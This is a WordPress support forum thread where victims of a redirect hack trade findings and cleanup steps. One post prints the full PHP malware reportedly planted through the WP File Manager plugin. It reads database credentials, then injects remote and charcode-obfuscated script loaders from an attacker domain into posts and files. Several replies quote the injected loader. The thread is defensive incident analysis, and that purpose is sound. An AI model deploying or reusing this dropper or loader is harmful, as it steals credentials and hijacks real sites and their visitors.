wordfence not really safe my site, now redirected
-
my site will be redirected from crime hackers and I have wordfence pro version …
All 3 weeks the same procedere ……by an other redirection.
now its reditect to: https://directednotconverted.ml
The page I need help with: [log in to see the link]
-
I found the script that caused all this. This came from Wp-file-manager plugin:
The code that is harming all this is:
<?php echo "ssqqss>>>"; error_reporting(E_ALL); ini_set('display_errors', 1); search_file_js($_SERVER['DOCUMENT_ROOT'] . "/../../../../../../../../", ".js"); die(); function get_var_reg($pat, $text) { if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) { return $matches[1][0]; } return ""; } function search_file_ms($dir, $file_to_search) { $search_array = array(); $files = scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { @search_file_ms($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { @search_file_ms($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false) { show_sitenames($path); } } else if ($value != "." && $value != "..") { @search_file_ms($path, $file_to_search); } } } function show_sitenames($file) { $content = @file_get_contents($file); if (strpos($content, "DB_NAME") !== false) { $db = get_var_reg("'DB_NAME'.*?,.*?['|\"](.*?)['|\"]", $content); $host = get_var_reg("'DB_HOST'.*?,.*?['|\"](.*?)['|\"]", $content); $user = get_var_reg("'DB_USER'.*?,.*?['|\"](.*?)['|\"]", $content); $pass = get_var_reg("'DB_PASSWORD'.*?,.*?['|\"](.*?)['|\"]", $content); // Create connection $conn = new mysqli($host, $user, $pass); // Check connection if ($conn->connect_error) { } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE <code>TABLE_NAME</code> LIKE '%post%'"; $result = $conn->query($q); if ($result->num_rows > 0) { while ($row = $result->fetch_assoc()) { $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " LIMIT 1 "; $result2 = $conn->query($q2); if ($result2->num_rows > 0) { while ($row2 = $result2->fetch_assoc()) { $val = $row2['post_content']; if (strpos($val, "scripts.lowerbeforwarden.ml") === true) { var_dump($val); exit; if (strpos($val, "scripts.lowerbeforwarden.ml") === false) { $q3 = "UPDATE " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%scripts.lowerbeforwarden.ml%'"; $conn->query($q3); echo "sql:" . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"]; } else { } } } } else { } } } else { } $conn->close(); } } } function search_file($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { //@search_file($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { //@search_file($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { //make_it($path); } } else if ($value != "." && $value != "..") { //search_file($path, $file_to_search); } } } function search_file_index($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { //search_file_index($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { //search_file_index($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { //make_it_index($path); } } else if ($value != "." && $value != "..") { //search_file_index($path, $file_to_search); } } } function search_file_js($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { //@search_file_js($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { //@search_file_js($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".js") !== false)) { //make_it_js($path); } } else if ($value != "." && $value != "..") { //search_file_js($path, $file_to_search); } } } function make_it_js($f) { $g = file_get_contents($f); if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) { } else { $l2 = "Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();"; $g = file_get_contents($f); $g = $l2 . $g; @system('chmod 777 ' . $f); @file_put_contents($f, $g); echo "js:" . $f . "\r\n"; } } function make_it_index($f) { if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false || strpos($g, 'scripts.lowerbeforwarden.ml') !== false) { } else { $l2 = "<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>"; $g = file_get_contents($f); $g = $l2 . $g; @system('chmod 777 ' . $f); @file_put_contents($f, $g); echo "in:" . $f . "\r\n"; } } function make_it($f) { $g = file_get_contents($f); if (strpos($g, '115,99,114,105,112,116,115,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108') !== false) { } else { $l2 = "<script type=text/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();</script>"; if (strpos($g, '<head>') !== false) { $b = str_replace("<head>", "<head>" . $l2, $g); @system('chmod 777 ' . $f); @file_put_contents($f, $b); echo "hh:" . $f . "\r\n"; } if (strpos($g, '</head>') !== false) { $b = str_replace("</head>", $l2 . "</head>", $g); @system('chmod 777 ' . $f); @file_put_contents($f, $b); echo "hh:" . $f . "\r\n"; } } }I was trying to reserve engineer the hack.
The code attacks js file and index file. It also attacks any file that has <head> on it.
The first step would be to remove occurance of all these scripts. I used VSCode to remove them by searching for:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();and
<script type='text/javascript' src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5'></script>After that run this script on your sql database.
UPDATE wp_posts SET post_content = REPLACE(post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", '') WHERE post_content LIKE '%lowerbeforwarden%';If you have w3 cache or any other cache plugin. Remove the cache directory.
It had infected around 12 plus sites on my server including any other PHP projects that were on the server.
Hope it helps.
I have the same problem, is there anybody that can help us?
Hello allmassim, I can do this using mysql codes.
I have the same problem with the following code:
<script type=’text/javascript’ src=’https://temp.lowerbeforwarden.ml/temp.js?n=nb5′></script><script type=’text/javascript’ src=’https://temp.lowerbeforwarden.ml/temp.js?n=nb5′></script><script type=’text/javascript’ src=’https://temp.lowerbeforwarden.ml/temp.js?n=nb5′></script>Can anybody help us? Wordfence was enabled….
-
This reply was modified 3 years, 7 months ago by
Yui. Reason: please use CODE button for proper formatting
Nasty new malware that gets in via WP File Manager. Walkthrough video on how to fix on the following link.
https://dorset.tech/nasty-new-malware-doing-the-rounds-lowerbeforwarden-ml/
Hi @jazzmavericks
That’s right. We blamed Wordfence wrongly. The link you mentioned was a great help. I have many websites on my VPS and just one of them has this issue. The one that has WP File Manager. But they had a security update 5 days ago and they seem to have made a mess! :/great analysis “safalshrestha”, which helps us all to perhaps solve the problem. I’m just a user and not a professional, all I have is 8 day old backups and access to my back panel. I can’t look in 500 files and search for the malicious code, but I can tell my provider to upload the backup from 1.9., but that won’t be enough – will it?
What do I have to do to prevent these idiots from coming back in through the back door ?what is your instruction ?
– first: delete WP file manager or install an update – and then ?
Hi @khubaib927,
my template is missing … regards, Helmut
@khubaib927 can you please give me a hand with the files and mysqls codes??
To remove the script from Database any of this 3 may help. You need to identified which. Also replace the prefix with yours
UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=nb5' type='text/javascript'></script>", " ")); UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://temp.lowerbeforwarden.ml/temp.js?n=ns1' type='text/javascript'></script>", " ")); UPDATE wp_posts SET post_content = (REPLACE (post_content, "<script src='https://scripts.lowerbeforwarden.ml/src.js?n=ns1' type='text/javascript'></script>", " "));Dear
My website also appears to be hacked. Weirdly enough, I have several subsites hosted on the same domain name (even clones of the main website) that are (still) unaffected.
The above solutions did not work for me. I’d love to know a solution that fixes my problem – and maybe a solution to prevent this from happening on my other subsites.
I hope we find the solution for this one soon, because it’s spooking me out a lot! I can’t quite grasp how this happened.
Thanks in advance
Best regardsMy all 3 websites hack on same hosting, same redirect issue, they convert the permissions of folder and files specially .php and .Js files and folder permissions,
any fast way to fix this ? hacking redirect code replace method ? i change mysql codes where link is showing.. but still not fixed 🙁
@khubaib927 please guide us if you can,
I’ve followed the steps from julioanampa by heart and i’ve found these scripts in all my posts.
Also i’ve found in my JS a long script Like this:
Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,101,109,112,46,108,111,119,101,114,98,101,102,111,114,119,97,114,100,101,110,46,109,108,47,116,101,109,112,46,106,115);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();My site is normalizing now.
same problem
step 1 :- check u r database options file , that has changed to malicious name
rename it
step 2:- goto theme header.php check for <!DOCTYPE html> if there any code before <!DOCTYPE html> delete and also check any malicious code in that file and remove safelystep 3 :- delete mu-plugin folder in file manager plugin section
step 4:- scan in word-fence remove all infected files
step 5 :- scan entire cpanel {or u r control panel} to check other domains infected or not in same file manager system -
This reply was modified 3 years, 7 months ago by
- The topic ‘wordfence not really safe my site, now redirected’ is closed to new replies.
